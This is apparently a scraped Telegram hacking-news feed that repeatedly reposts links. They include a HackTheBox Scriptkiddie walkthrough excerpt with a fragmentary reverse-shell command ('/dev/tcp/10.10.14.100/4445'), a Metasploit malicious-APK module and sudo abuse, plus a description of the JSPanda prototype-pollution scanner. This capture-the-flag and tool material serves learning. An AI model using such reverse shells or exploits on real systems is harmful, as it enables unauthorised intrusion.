Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox — Validation
https://cdn-images-1.medium.com/max/1180/1*QhgSL8oGQ8Q1r0LE8EcXyw.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox — Validation
https://cdn-images-1.medium.com/max/1180/1*QhgSL8oGQ8Q1r0LE8EcXyw.png
As always, we start with nmap to discover open ports/services.
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox — Validation
As always, we start with nmap to discover open ports/services.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Bug Bounty en Software Libre
https://cdn-images-1.medium.com/max/1153/0*pu9MidpmuWL3F6UZ
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKING
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Bug Bounty en Software Libre
https://cdn-images-1.medium.com/max/1153/0*pu9MidpmuWL3F6UZ
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKING
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Bounty en Software Libre
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKING
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
http://www.kitploit.com/2021/09/jspanda-client-side-prototype-pullution.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/09/jspanda-client-side-prototype-pullution.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
JSpanda is client-side prototype pollution vulnerability (https://www.kitploit.com/search/label/Vulnerability) scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code. However, JSpanda cannot detect advanced prototype pollution vulnerabilities.
How JSPanda works?
Uses multiple payloads for prototype pollution vulnerability. Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver. Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually.
Requirements
Download latest version of Google Chrome and Chromedriver Selenium
Usage
Scan: python3.7 jspanda.py Add URLs to url.txt file, for instance : example.com Basic Source Code Analysis (https://www.kitploit.com/search/label/Source%20Code%20Analysis) : python3.7 analyze.py Add a JavaScript library's source code to analyze.js Generate PoC code using analyze.py Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything.
Demonstration
___________________________
@hacking_Attack
@Hacking_Video
How JSPanda works?
Uses multiple payloads for prototype pollution vulnerability. Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver. Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually.
Requirements
Download latest version of Google Chrome and Chromedriver Selenium
Usage
Scan: python3.7 jspanda.py Add URLs to url.txt file, for instance : example.com Basic Source Code Analysis (https://www.kitploit.com/search/label/Source%20Code%20Analysis) : python3.7 analyze.py Add a JavaScript library's source code to analyze.js Generate PoC code using analyze.py Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything.
Demonstration
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Source code analysis (https://www.kitploit.com/search/label/Code%20Analysis) - Screenshot
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Supporting Materials : https://twitter.com/har1sec/status/1314469278322655233 https://github.com/BlackFan/client-side-prototype-pollution https://github.com/ThePacketBender/notes/blob/01c0b834f6e3ee4d934b087b2d92c9e484dc2a50/web/prototype_pollution.txt https://habr.com/ru/company/huawei/blog/547178/ https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 https://github.com/securitum/research/tree/master/r2020_prototype-pollution Learn (https://attacker-codeninja.github.io/2021-07-05-Learn-Prototype-Pollution-Part-2/)Prototype Pollution (https://www.kitploit.com/search/label/Prototype%20Pollution) in Series - Part 2 dwisiswant0/ppfuzz (https://github.com/dwisiswant0/ppfuzz) GitHub - raverrr/plution: Prototype pollution scanner using headless chrome (https://github.com/raverrr/plution) JavaScript Prototype Poisoning Vulnerabilities in the Wild (https://medium.com/intrinsic-blog/javascript-prototype-poisoning-vulnerabilities-in-the-wild-7bc15347c96) The Complete Guide to Prototype Pollution Vulnerabilities (https://www.whitesourcesoftware.com/resources/blog/prototype-pollution-vulnerabilities/)
Download Jspanda (https://github.com/RedSection/jspanda)
___________________________
@hacking_Attack
@Hacking_Video
Download Jspanda (https://github.com/RedSection/jspanda)
___________________________
@hacking_Attack
@Hacking_Video
Twitter
harisec
Something I've learned recently. When working on client-side Prototype Pollution bugs you can set a breakpoint on access to the property you want to pollute to get to the root cause. Video youtu.be/OvOyW4jQNps and function to set breakpoint on access gis…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Scriptkiddie HackTheBox Walkthrough
Script Kiddie is a CTF hosted on Hack the Box with Beginner categories. The objective for the participant is to identify the files user.txt and root.txt on the victim's system.
Penetration Methodlogies · NmapExploit· Generating apkPost Enumeration· Capture User.txtPrivilege Escalation· Abusing Sudo RightReconHTB labs are online and it has a static IP of 10.129.95.150, thus let's start with nmap aggressive port.ExploitingI load msfconsole and run the following module for creating malicious apk while concurrently starting the netcat listener in another terminal use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection& /dev/tcp/10.10.14.100/4445 0>&1' #" >> hackersAbusing Sudo RightAnd now we have access to the user pwn! Then we examined for sudo rights and discovered that the user had sudo permission for running the meatsploit framework as root. https://1.bp.blogspot.com/--qiSo1s4zbU/YUy2HISJw4I/AAAAAAAAypo/mXna93VIlsEGHG-o4hw2FkJqK7-XXdzZgCLcBGAsYHQ/s16000/50.png Let's see if we can get root access by abusing this permission.___________________________
@hacking_Attack
@Hacking_Video
Scriptkiddie HackTheBox Walkthrough
Script Kiddie is a CTF hosted on Hack the Box with Beginner categories. The objective for the participant is to identify the files user.txt and root.txt on the victim's system.
Penetration Methodlogies · NmapExploit· Generating apkPost Enumeration· Capture User.txtPrivilege Escalation· Abusing Sudo RightReconHTB labs are online and it has a static IP of 10.129.95.150, thus let's start with nmap aggressive port.ExploitingI load msfconsole and run the following module for creating malicious apk while concurrently starting the netcat listener in another terminal use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection& /dev/tcp/10.10.14.100/4445 0>&1' #" >> hackersAbusing Sudo RightAnd now we have access to the user pwn! Then we examined for sudo rights and discovered that the user had sudo permission for running the meatsploit framework as root. https://1.bp.blogspot.com/--qiSo1s4zbU/YUy2HISJw4I/AAAAAAAAypo/mXna93VIlsEGHG-o4hw2FkJqK7-XXdzZgCLcBGAsYHQ/s16000/50.png Let's see if we can get root access by abusing this permission.___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Scriptkiddie HackTheBox Walkthrough
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
JSpanda is client-side prototype pollution vulnerability scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code. However, JSpanda cannot detect advanced prototype pollution vulnerabilities.How JSPanda works? Uses multiple payloads for prototype pollution vulnerability. Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver. Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually. Requirements Download latest version of Google Chrome and Chromedriver Selenium Usage Scan: python3.7 jspanda.py Add URLs to url.txt file, for instance : example.com Basic Source Code Analysis : python3.7 analyze.py Add a JavaScript library's source code to analyze.js Generate PoC code using analyze.py Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything. Demonstration Source code analysis - Screenshot Supporting Materials : https://twitter.com/har1sec/status/1314469278322655233 https://github.com/BlackFan/client-side-prototype-pollution https://github.com/ThePacketBender/notes/blob/01c0b834f6e3ee4d934b087b2d92c9e484dc2a50/web/prototype_pollution.txt https://habr.com/ru/company/huawei/blog/547178/ https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 https://github.com/securitum/research/tree/master/r2020_prototype-pollution Learn Prototype Pollution in Series - Part 2 dwisiswant0/ppfuzz GitHub - raverrr/plution: Prototype pollution scanner using headless chrome JavaScript Prototype Poisoning Vulnerabilities in the Wild The Complete Guide to Prototype Pollution Vulnerabilities Download Jspanda
Read more...
___________________________
@hacking_Attack
@Hacking_Video
JSpanda is client-side prototype pollution vulnerability scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code. However, JSpanda cannot detect advanced prototype pollution vulnerabilities.How JSPanda works? Uses multiple payloads for prototype pollution vulnerability. Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver. Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually. Requirements Download latest version of Google Chrome and Chromedriver Selenium Usage Scan: python3.7 jspanda.py Add URLs to url.txt file, for instance : example.com Basic Source Code Analysis : python3.7 analyze.py Add a JavaScript library's source code to analyze.js Generate PoC code using analyze.py Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything. Demonstration Source code analysis - Screenshot Supporting Materials : https://twitter.com/har1sec/status/1314469278322655233 https://github.com/BlackFan/client-side-prototype-pollution https://github.com/ThePacketBender/notes/blob/01c0b834f6e3ee4d934b087b2d92c9e484dc2a50/web/prototype_pollution.txt https://habr.com/ru/company/huawei/blog/547178/ https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 https://github.com/securitum/research/tree/master/r2020_prototype-pollution Learn Prototype Pollution in Series - Part 2 dwisiswant0/ppfuzz GitHub - raverrr/plution: Prototype pollution scanner using headless chrome JavaScript Prototype Poisoning Vulnerabilities in the Wild The Complete Guide to Prototype Pollution Vulnerabilities Download Jspanda
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Twitter
harisec
Something I've learned recently. When working on client-side Prototype Pollution bugs you can set a breakpoint on access to the property you want to pollute to get to the root cause. Video youtu.be/OvOyW4jQNps and function to set breakpoint on access gis…
Bug Bounty en Software Libre
https://ehcgroup.medium.com/bug-bounty-en-software-libre-919a7fe31c44?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://ehcgroup.medium.com/bug-bounty-en-software-libre-919a7fe31c44?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Bounty en Software Libre
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKING
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKINGContinue reading on Medium » (https://ehcgroup.medium.com/bug-bounty-en-software-libre-919a7fe31c44?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bug Bounty en Software Libre
PUBLICADO EN 23 SEPTIEMBRE, 2021POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png JSpanda is client-side prototype pollution vulnerability scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code.
However, JSpanda cannot detect advanced prototype pollution vulnerabilities. How JSPanda works?* Uses multiple payloads for prototype pollution vulnerability.
* Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver.
* Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually. Requirements* Download latest version of Google Chrome and Chromedriver
* Selenium UsageScan: python3.7 jspanda.py
* Add URLs to url.txt file, for instance : example.com
Basic Source Code Analysis : python3.7 analyze.py
* Add a JavaScript library's source code to analyze.js
* Generate PoC code using analyze.py
* Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything. Demonstrationhttps://camo.githubusercontent.com/b6c5d8b24c254dcdea70d25100ce01491c28c93b9d373a2a270606ed3b38da67/68747470733a2f2f61736369696e656d612e6f72672f612f424f617a674156795736794871685545336645596343694d4c2e737667 Source code analysis - Screenshothttps://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png Supporting Materials : https://twitter.com/har1sec/status/1314469278322655233 https://github.com/BlackFan/client-side-prototype-pollution https://github.com/ThePacketBender/notes/blob/01c0b834f6e3ee4d934b087b2d92c9e484dc2a50/web/prototype_pollution.txt https://habr.com/ru/company/huawei/blog/547178/ https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 https://github.com/securitum/research/tree/master/r2020_prototype-pollution Learn Prototype Pollution in Series - Part 2 dwisiswant0/ppfuzz GitHub - raverrr/plution: Prototype pollution scanner using headless chrome JavaScript Prototype Poisoning Vulnerabilities in the Wild The Complete Guide to Prototype Pollution Vulnerabilities Download Jspanda
___________________________
@hacking_Attack
@Hacking_Video
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png JSpanda is client-side prototype pollution vulnerability scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code.
However, JSpanda cannot detect advanced prototype pollution vulnerabilities. How JSPanda works?* Uses multiple payloads for prototype pollution vulnerability.
* Gathers all the links in the targets for scanning and add payloads to JSpanda-obtained URLs, navigates to each URL with headless Chromedriver.
* Scans all words in the source code of potentially vulnerable JavaScript library and it creates a simple JS PoC by finding the script gadget, helping you analyze the code manually. Requirements* Download latest version of Google Chrome and Chromedriver
* Selenium UsageScan: python3.7 jspanda.py
* Add URLs to url.txt file, for instance : example.com
Basic Source Code Analysis : python3.7 analyze.py
* Add a JavaScript library's source code to analyze.js
* Generate PoC code using analyze.py
* Execute PoC code on Chrome's console. It pollutes all the words collected from the source code and show it on the screen. So it may generate false positive results. These outputs provide additional information to researchers, do not automate everything. Demonstrationhttps://camo.githubusercontent.com/b6c5d8b24c254dcdea70d25100ce01491c28c93b9d373a2a270606ed3b38da67/68747470733a2f2f61736369696e656d612e6f72672f612f424f617a674156795736794871685545336645596343694d4c2e737667 Source code analysis - Screenshothttps://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png Supporting Materials : https://twitter.com/har1sec/status/1314469278322655233 https://github.com/BlackFan/client-side-prototype-pollution https://github.com/ThePacketBender/notes/blob/01c0b834f6e3ee4d934b087b2d92c9e484dc2a50/web/prototype_pollution.txt https://habr.com/ru/company/huawei/blog/547178/ https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 https://github.com/securitum/research/tree/master/r2020_prototype-pollution Learn Prototype Pollution in Series - Part 2 dwisiswant0/ppfuzz GitHub - raverrr/plution: Prototype pollution scanner using headless chrome JavaScript Prototype Poisoning Vulnerabilities in the Wild The Complete Guide to Prototype Pollution Vulnerabilities Download Jspanda
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
JSPanda - Client-Side Prototype Pullution Vulnerability Scanner
hacking: security in practice
My Phone Randomly Started Broadcasting a Stranger's Conversation?
I don't know if this is the right place for this but I was watching a Youtube video when it suddenly got paused and I heard a man's voice in the middle of a conversation talking about healthcare (he spoke English, even though I'm in Germany). Then he said "Over." and a few moments later a woman started talking before my phone was disconnected from the conversation. I didn't have any other apps open in the background and now I'm kinda freaked out. Does anyone know how and why my phone randomly picked up the signal? (I have a Samsung Galaxy S10) And is it something I should be worried about?
submitted by /u/Bo_jelin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
My Phone Randomly Started Broadcasting a Stranger's Conversation?
I don't know if this is the right place for this but I was watching a Youtube video when it suddenly got paused and I heard a man's voice in the middle of a conversation talking about healthcare (he spoke English, even though I'm in Germany). Then he said "Over." and a few moments later a woman started talking before my phone was disconnected from the conversation. I didn't have any other apps open in the background and now I'm kinda freaked out. Does anyone know how and why my phone randomly picked up the signal? (I have a Samsung Galaxy S10) And is it something I should be worried about?
submitted by /u/Bo_jelin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
My Phone Randomly Started Broadcasting a Stranger's Conversation?
I don't know if this is the right place for this but I was watching a Youtube video when it suddenly got paused and I heard a man's voice in the...